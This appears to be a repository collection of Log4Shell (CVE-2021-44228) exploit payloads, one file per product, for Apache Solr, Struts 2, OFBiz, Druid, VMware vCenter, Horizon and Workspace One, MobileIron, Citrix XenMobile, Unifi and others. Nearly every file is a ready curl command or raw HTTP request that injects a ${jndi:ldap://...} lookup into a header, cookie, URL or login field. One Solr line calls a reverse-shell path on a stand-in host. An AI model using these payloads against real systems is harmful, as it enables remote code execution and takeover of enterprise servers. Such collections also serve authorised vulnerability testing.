├── Apache JSPWiki
├── Apache OFBiz
├── Apache Druid
├── Citrix XenMobile
├── Apache James
├── Apache Struts 2
├── Apache Solr
├── VMWare vCenter
├── MobileIron
├── Unifi Network Appliance
├── VMWare Workspace One
└── VMWare Horizon


/Apache JSPWiki:
--------------------------------------------------------------------------------
1 | # Source: https://twitter.com/sirifu4k1/status/1470011568834424837
2 | 
3 | http://localhost:8080/JSPWiki/wiki/$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/
4 | 


--------------------------------------------------------------------------------
/Apache OFBiz:
--------------------------------------------------------------------------------
1 | # Source: https://twitter.com/sirifu4k1/status/1470011568834424837
2 | 
3 | "Cookie: OFBiz.Visitor=\${jndi:ldap://localhost:1270/abc}" https://localhost:8443/webtools/control/main 
4 | 


--------------------------------------------------------------------------------
/Apache Druid:
--------------------------------------------------------------------------------
1 | # Source: https://twitter.com/sirifu4k1/status/1470011568834424837
2 | 
3 | 
4 | 'http://localhost:8888/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2flocalhost:1270%2fabc%7d
5 | 


--------------------------------------------------------------------------------
/Citrix XenMobile:
--------------------------------------------------------------------------------
1 | Source: https://twitter.com/twcsftech/status/1471716640606007299
2 | 
3 | curl https://<TARGET>/zdm/cxf/login -H 'Referer: https://<TARGET>/zdm' -d 'login=${jndi:ldap://<PAYLOAD>/wibtio}&password=' -k 
4 | 


--------------------------------------------------------------------------------
/Apache James:
--------------------------------------------------------------------------------
1 | # Source: https://twitter.com/sirifu4k1/status/1470011568834424837
2 | 
3 | smtp://localhost" --user "test:test" --mail-from '${jndi:ldap://localhost:1270/a}@gmail.com' --mail-rcpt 'test' --upload-file email.txt 
4 | 


--------------------------------------------------------------------------------
/Apache Struts 2:
--------------------------------------------------------------------------------
1 | # Source: https://twitter.com/sirifu4k1/status/1470011568834424837
2 | 
3 | 
4 | http://127.0.0.1:8080/struts2-showcase/token/transfer4.action -d http://struts.token.name='${jndi:rmi://127.0 .0.1:1099/ilysm}'
5 | http://localhost:8080/struts2-showcase/$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/
6 | 


--------------------------------------------------------------------------------
/Apache Solr:
--------------------------------------------------------------------------------
1 | # Source: https://twitter.com/sirifu4k1/status/1470011568834424837
2 | 
3 | /solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json
4 | 
5 | 'http://localhost:8983/solr/admin/cores?action=CREATE&name=$%7Bjndi:ldap://10.0.0.6:1270/abc%7D&wt=json' 
6 | 
7 | solr/admin/info/system?_=${jndi:ldap://192.168.1.1/exp}&wt=json
8 | 


--------------------------------------------------------------------------------
/VMWare vCenter:
--------------------------------------------------------------------------------
1 | Source: https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis
2 | 
3 | # Need to replace photon-machine.lan with SSO login realm for target. (Usually vsphere.local)
4 | curl --insecure  -vv -H "X-Forwarded-For: \${jndi:ldap://<PAYLOAD>:1389/o=tomcat}" "https://<TARGET>/websso/SAML2/SSO/photon-machine.lan?SAMLRequest="
5 | 
6 | 


--------------------------------------------------------------------------------
/MobileIron:
--------------------------------------------------------------------------------
 1 | # Source: https://github.com/rwincey/CVE-2021-44228-Log4j-Payloads
 2 | 
 3 | POST /mifs/j_spring_security_check HTTP/1.1
 4 | Host: <Target>
 5 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
 6 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 7 | Accept-Language: en-US,en;q=0.5
 8 | Accept-Encoding: gzip, deflate
 9 | Referer: https://<Target>/mifs/user/login.jsp
10 | Content-Type: application/x-www-form-urlencoded
11 | Content-Length: 102
12 | Origin: https://<Target>
13 | Connection: close
14 | Cookie: JSESSIONID=BE682E060EBF041A2B65EAC7E47F4F80
15 | Upgrade-Insecure-Requests: 1
16 | 
17 | j_username=<JNDI Payload>&j_password=password&logincontext=employee
18 | 


--------------------------------------------------------------------------------
/Unifi Network Appliance:
--------------------------------------------------------------------------------
 1 | POST /api/login HTTP/2
 2 | Host: <TARGET> 
 3 | Content-Length: 109
 4 | Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
 5 | Sec-Ch-Ua-Mobile: ?0
 6 | User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
 7 | Sec-Ch-Ua-Platform: "macOS"
 8 | Content-Type: application/json; charset=utf-8
 9 | Accept: */*
10 | Origin: https://<TARGET>
11 | Sec-Fetch-Site: same-origin
12 | Sec-Fetch-Mode: cors
13 | Sec-Fetch-Dest: empty
14 | Referer: https://<TARGET>/manage/account/login?redirect=%2Fmanage
15 | Accept-Encoding: gzip, deflate
16 | Accept-Language: en-US,en;q=0.9
17 | 
18 | {"username":"asdf","password":"asdfas","remember":"${jndi:ldap://<PAYLOAD>:1389/o=tomcat}","strict":true}
19 | 


--------------------------------------------------------------------------------
/VMWare Workspace One:
--------------------------------------------------------------------------------
 1 | # Source: https://github.com/rwincey/CVE-2021-44228-Log4j-Payloads
 2 | 
 3 | POST /SAAS/auth/login/userstore HTTP/1.1
 4 | Host: <TARGET>
 5 | Cookie: JSESSIONID=FD571A97DE36B94D85627EDD88B9E6A4
 6 | Content-Length: 457
 7 | Cache-Control: max-age=0
 8 | Upgrade-Insecure-Requests: 1
 9 | Origin: <TARGET>
10 | Content-Type: application/x-www-form-urlencoded
11 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
12 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
13 | Referer: https://<TARGET>/SAAS/auth/login/embeddedauthbroker/callback
14 | Accept-Encoding: gzip, deflate
15 | Accept-Language: en-US,en;q=0.9
16 | Connection: close
17 | 
18 | isJavascriptEnabled=&areCookiesEnabled=&dest=<JNDI Payload>&useragent=&userInput=&workspaceId=&groupUuidsStr=&isWindows10EnrollmentFlow=false&username=joe&userStoreDomain=&remember=true&userStoreFormSubmit=
19 | 


--------------------------------------------------------------------------------
/VMWare Horizon:
--------------------------------------------------------------------------------
 1 | # Source: https://github.com/rwincey/CVE-2021-44228-Log4j-Payloads
 2 | 
 3 | POST /broker/xml HTTP/1.1
 4 | Host: <TARGET>
 5 | Cookie: JSESSIONID=086D05062F2F437B0D36382DEFEF67FA
 6 | Cache-Control: max-age=0
 7 | Upgrade-Insecure-Requests: 1
 8 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
 9 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
10 | Accept-Encoding: gzip, deflate
11 | Accept-Language: en-US,en;q=0.9
12 | Connection: close
13 | Content-Type: application/x-www-form-urlencoded
14 | Content-Length: 619
15 | 
16 | <?xml version="1.0"?>
17 | <broker version="2.0">
18 |  <do-submit-authentication>
19 |  <screen>
20 |  <name>disclaimer</name>
21 |  <params>
22 |  <param>
23 |  <name>accept</name>
24 |  <values>
25 |  <value>true</value>
26 |  </values>
27 |  </param>
28 |  </params>
29 |  </screen>
30 |  </do-submit-authentication>
31 |  <do-submit-authentication>
32 |  <screen>
33 |  <name>securid-passcode</name>
34 |  <params>
35 |  <param>
36 |  <name>username</name>
37 |  <values>
38 |  <value>${jndi:ldap://example.com}</value>
39 |  </values>
40 |  </param>
41 |  <param>
42 |  <name>passcode</name>
43 |  <values>
44 |  <value>271828183</value>
45 |  </values>
46 |  </param>
47 |  </params>
48 |  </screen>
49 |  </do-submit-authentication>
50 | </broker>
51 | 
52 | 
53 | POST /broker/xml HTTP/1.1
54 | Host: <TARGET>
55 | Cookie: JSESSIONID=086D05062F2F437B0D36382DEFEF67FA
56 | Cache-Control: max-age=0
57 | Upgrade-Insecure-Requests: 1
58 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
59 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
60 | Accept-Encoding: gzip, deflate
61 | Accept-Language: en-US,en;q=0.9
62 | Connection: close
63 | Content-Type: application/x-www-form-urlencoded
64 | Content-Length: 440
65 | 
66 | <?xml version='1.0' encoding='UTF-8'?><broker version='14.0'><do-submit-authentication><screen><name>windows-password</name><params><param><name>username</name><values><value>simon</value></values></param><param><name>domain</name><values><value>TEST</value></values></param><param><name>password</name><values><value>{SSO-AES:1}ZXbtEwRmeGs80cyD1sRsS6sVRgVt7pYR</value></values></param></params></screen></do-submit-authentication></broker>
67 | 


--------------------------------------------------------------------------------